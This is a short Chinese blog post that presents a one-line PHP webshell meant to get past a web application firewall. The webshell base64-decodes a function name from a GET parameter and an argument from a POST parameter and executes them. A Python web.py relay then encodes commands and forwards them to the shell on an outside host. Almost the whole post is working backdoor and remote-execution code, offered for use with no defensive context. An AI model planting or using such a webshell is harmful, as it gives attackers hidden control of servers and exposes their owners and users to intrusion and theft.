PHP 一句话webshell绕过WAF

<?php

$a = base64_decode($_GET[huai]);

$b = base64_decode($_POST[xia]);

$a($b);

?>



import web

import requests

import urllib2

import base64


urls = (

    '/','hello'

)


app = web.application(urls,globals())


class hello:

    def POST(self):

        payload = web.input()

        payload['xia'] = base64.b64encode(payload['xia'])

        print payload   

        req = requests.post('https://www.xxx.jp/error.php?huai=YXNzZXJ0',data=payload)

        return req.content


if __name__ == "__main__":

    app.run()


评论
热度 ( 1 )

© ID1536264 | Powered by LOFTER